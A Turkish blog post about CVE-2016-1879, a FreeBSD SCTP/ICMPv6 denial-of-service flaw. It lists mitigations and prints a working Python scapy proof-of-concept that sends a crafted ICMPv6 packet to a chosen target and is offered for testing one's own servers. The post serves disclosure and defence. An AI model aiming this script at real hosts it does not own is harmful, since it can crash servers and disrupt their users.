27 Ocak 2016 Çarşamba

SCTP ICMPv6 error processing vulnerability (CVE-2016-1879)


Freebsd tabanlı sunucularda Ipv6 SCTP socketi kullanılarak yapılan ICMPv6 dos saldırısı sonucu freebsd sunucular etkilenmektedir. Aşağıda saldırı ve etkisi ile ilgili bir video da bulunmaktadır.

Bu açık FreeBSD sistemlerden (versiyon 9.3, 10.1 ve 10.2) SCTP desteği olan ve IPV6 default konfigürasyonunu kullananlar etkilenmektedir.

Sisteminizi korumak için;

1. Eğer gerekli değilse ipv6 desteğini kapatınız.
2. ICMPv6'yı ve IPv6 trafiğini firewallunuzda engelleyiniz.
3. SCTP stack desteğini çekirdeğinizi yeniden derleyerek kapatın.

Test amaçlı kullanılan python scripti aşağıdaki gibidir. Sistemlerinizin etkilenip etkilenmediğini test edebilirsiniz.

#!/usr/bin/env python # -*- coding: utf-8 -*- import argparse from scapy.all import * def get_args(): parser = argparse.ArgumentParser(description='#' * 78, epilog='#' * 78) parser.add_argument("-m", "--dst_mac", type=str, help="FreeBSD mac address") parser.add_argument("-i", "--dst_ipv6", type=str, help="FreeBSD IPv6 address") parser.add_argument("-I", "--iface", type=str, help="Iface") options = parser.parse_args() if options.dst_mac is None or options.dst_ipv6 is None: parser.print_help() exit() return options if __name__ == '__main__': options = get_args() sendp(Ether(dst=options.dst_mac) / IPv6(dst=options.dst_ipv6) / ICMPv6DestUnreach() / IPv6(nh=132, src=options.dst_ipv6, dst='fe80::230:56ff:fea6:648c'), iface=options.iface)


0 yorum:

Paylaş

Twitter Delicious Facebook Digg Stumbleupon Favorites